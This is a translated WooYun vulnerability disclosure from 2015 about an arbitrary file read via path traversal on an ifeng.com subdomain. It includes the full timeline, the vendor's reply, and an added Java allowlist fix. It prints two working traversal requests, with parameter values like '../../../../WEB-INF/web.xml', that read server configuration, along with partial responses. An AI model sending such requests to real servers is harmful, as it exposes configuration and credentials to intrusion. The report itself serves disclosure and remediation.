
Vulnerability Summary

Bug ID: wooyun-2015-0102889

Title: Arbitrary file read on a 凤凰网 (ifeng.com) site

Vendor: 凤凰网 (ifeng.com)

Author: 路人甲

Submitted: 2015-03-21 22:22

Fixed: 2015-05-07 09:54

Disclosed: 2015-05-07 09:54

Type: Arbitrary file traversal/download

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org



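Vulnerability Details

Disclosure status:

2015-03-21: Details reported to the vendor; awaiting vendor response
2015-03-23: Vendor confirmed; details disclosed to the vendor only
2015-04-02: Details disclosed to core white hats and relevant domain experts
2015-04-12: Details disclosed to regular white hats
2015-04-22: Details disclosed to trainee white hats
2015-05-07: Details disclosed to the public

Brief description:

Detailed description:

Site: hd.ifeng.com
The template parameter is not validated.
Request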

GET /city/city.d?u_id=23157ea9-ce30-4ec9-93dd-8b130ca67be65a6347&m=chg&city=%E4%B8%8A%E6%B5%B7&t=..%2f..%2f..%2f..%2fWEB-INF%2fweb.xml HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: hd.ifeng.com
Accept-Encoding: gzip, deflate


Response

HTTP/1.1 200 OK
Date: Sat, xx Mar 2015 xxxx GMT
Server: Apache/2.0.54 (Unix) Resin/3.0.26 PHP/5.2.3
Vary: Accept-Encoding
Content-Language: en-US
ETag: "BpV48e5vVyd"
Last-Modified: Sun, 21 Sep 2014 10:22:47 GMT
Content-Length: 7442
Set-Cookie: city=021; domain=.aibang.com; path=/; expires=Sat,
Content-Type: text/xml
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
<web-app version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">

<context-param>
<param-name>contextConfigLocation</param-name>
<param-value>
/WEB-INF/SPRING-CONF/applicationContext.xml
/WEB-INF/SPRING-CONF/applicationContext-db.xml
/WEB-INF/SPRING-CONF/applicationContext-ibatis.xml
</param-value>
</context-param>

<filter>
<filter-name>encoding</filter-name>
<filter-class>com.aibang.wap.filter.WapFilter</filter-class>
</filter>
<filter>
<filter-name>authFilter</filter-name>
<filter-class>com.aibang.wap.filter.AuthFilter</filter-class>
</filter>
<filter>
<filter-name>tuanAuthFilter</filter-name>
<filter-class>com.aibang.wap.filter.TuanAuthFilter</filter-class>
</filter>

<filter-mapping>
<filter-name>encoding</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>

<filter-mapping>
<filter-name>authFilter</filter-name>
<url-pattern>/user/*</url-pattern>
</filter-mapping>

<filter-mapping>
<filter-name>tuanAuthFilter</filter-name>
<url-pattern>/tuan/*</url-pattern>
</filter-mapping>

<filter-mapping>
<filter-name>authFilter</filter-name>
<url-pattern>/sms/*</url-pattern>
</filter-mapping>
。。。。。。。。。
。。。。。。。。。。。。。。


Request

GET /city/city.d?u_id=23157ea9-ce30-4ec9-93dd-8b130ca67be65a6347&m=chg&city=%E4%B8%8A%E6%B5%B7&t=..%2f..%2f..%2f..%2fWEB-INF%2fSPRING-CONF%2fapplicationContext-db.xml HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: hd.ifeng.com
Accept-Encoding: gzip, deflate


Response

HTTP/1.1 200 OK
Date: Sat, xxx
Server: Apache/2.0.54 (Unix) Resin/3.0.26 PHP/5.2.3
Vary: Accept-Encoding
Content-Language: en-US
ETag: "BpWEaVUhZ5h"
Last-Modified: Sun, 21 Sep 2014 10:22:49 GMT
Content-Length: 11078
Set-Cookie: city=021; domain=.aibang.com; path=/; expires=Sun,
Connection: close
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE beans PUBLIC "-//SPRING//DTD BEAN//EN" "http://www.springframework.org/dtd/spring-beans.dtd">
<beans>
<bean id="propertyConfigurer" class="org.wolf.web.context.WfPropertyPlaceholderConfigurer"/>
<bean id="ituands"
class="org.logicalcobwebs.proxool.ProxoolDataSource"
lazy-init="false">
<property name="driver">
<value>com.mysql.jdbc.Driver</value>
</property>
<property name="driverUrl">
<value>${ituan.db}</value>
</property>
<property name="user">
<value>${ituan.user}</value>
</property>
<property name="password">
<value>${ituan.pwd}</value>
</property>
<property name="alias">
<value>ituands</value>
</property>
<property name="houseKeepingSleepTime">
<value>300000</value>
</property>
<property name="prototypeCount">
<value>5</value>
</property>
<property name="maximumConnectionCount">
<value>200</value>
</property>
<property name="minimumConnectionCount">
<value>2</value>
</property>
<property name="trace">
<value>true</value>
</property>
<property name="verbose">
<value>true</value>
</property>
</bean>
<bean id="wapds"
class="org.logicalcobwebs.proxool.ProxoolDataSource"
lazy-init="false">
<property name="driver">
<value>com.mysql.jdbc.Driver</value>
</property>
<property name="driverUrl">
<value>${wap.db}</value>
</property>
<property name="user">
<value>${wap.user}</value>
</property>
<property name="password">
<value>${wap.pwd}</value>
</property>
<property name="alias">
<value>wapds</value>
</property>
<property name="houseKeepingSleepTime">
<value>300000</value>
</property>
<property name="prototypeCount">
<value>5</value>
</property>
<property name="maximumConnectionCount">
<value>300</value>
</property>
。。。。。。。。。。。
。。。。。。。。。。。。。。。


Proof of concept:

Fix:

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting
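
The two requests in the report succeed because the value of `t` reaches a file path unchecked. One way to validate such a parameter is shown here as an added example; it is not part of the original report or of the affected application's code. The class name `TemplateResolver`, the directory layout and the fixed `.xml` suffix are assumptions.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.regex.Pattern;

// Added example (hypothetical class): maps a request-supplied template name to a file
// that must live inside one template directory. Layout and ".xml" suffix are assumptions.
public class TemplateResolver {
    // Plain names only: no '/', '\', '.', '%' or control characters can match.
    private static final Pattern SAFE_NAME = Pattern.compile("[A-Za-z0-9_-]{1,64}");
    private final Path root;

    public TemplateResolver(Path templateRoot) throws IOException {
        this.root = templateRoot.toRealPath();   // canonical base, symlinks resolved
    }

    /** Returns the template file for name, or throws if name is not a known plain template. */
    public Path resolve(String name) throws IOException {
        if (name == null || !SAFE_NAME.matcher(name).matches()) {
            throw new IllegalArgumentException("invalid template name");
        }
        Path candidate = root.resolve(name + ".xml");
        if (!Files.isRegularFile(candidate)) {
            throw new IllegalArgumentException("unknown template");
        }
        // Defence in depth: a symlink inside the template directory must not lead outside it.
        Path real = candidate.toRealPath();
        if (!real.startsWith(root)) {
            throw new IllegalArgumentException("template escapes root");
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        // Constructed layout: <tmp>/WEB-INF/web.xml and <tmp>/templates/wap/city.xml
        Path app = Files.createTempDirectory("app");
        Path tpl = Files.createDirectories(app.resolve("templates").resolve("wap"));
        Files.createDirectories(app.resolve("WEB-INF"));
        Files.write(app.resolve("WEB-INF").resolve("web.xml"), "<web-app/>".getBytes());
        Files.write(tpl.resolve("city.xml"), "<page/>".getBytes());

        TemplateResolver r = new TemplateResolver(tpl);
        System.out.println("city -> " + r.resolve("city").getFileName());
        // The container has already URL-decoded t= by the time application code sees it.
        for (String t : new String[] {"../../../../WEB-INF/web.xml",
                "../../../../WEB-INF/SPRING-CONF/applicationContext-db.xml"}) {
            try { r.resolve(t); System.out.println("BUG: accepted " + t); }
            catch (IllegalArgumentException e) { System.out.println("rejected: " + t); }
        }
    }
}
```

The allowlist pattern does the real work: both values of `t` from the report are rejected before any filesystem call is made.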


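Vendor Response

Vendor response:

Severity: Low

Rank: 1

Confirmed: 2015-03-23 09:53

Vendor reply:

Thank you. This service is not ours; visit the site's domain and you will see that it is an Aibang (爱帮) service. We will contact them as soon as possible to get it fixed.

Latest status:

None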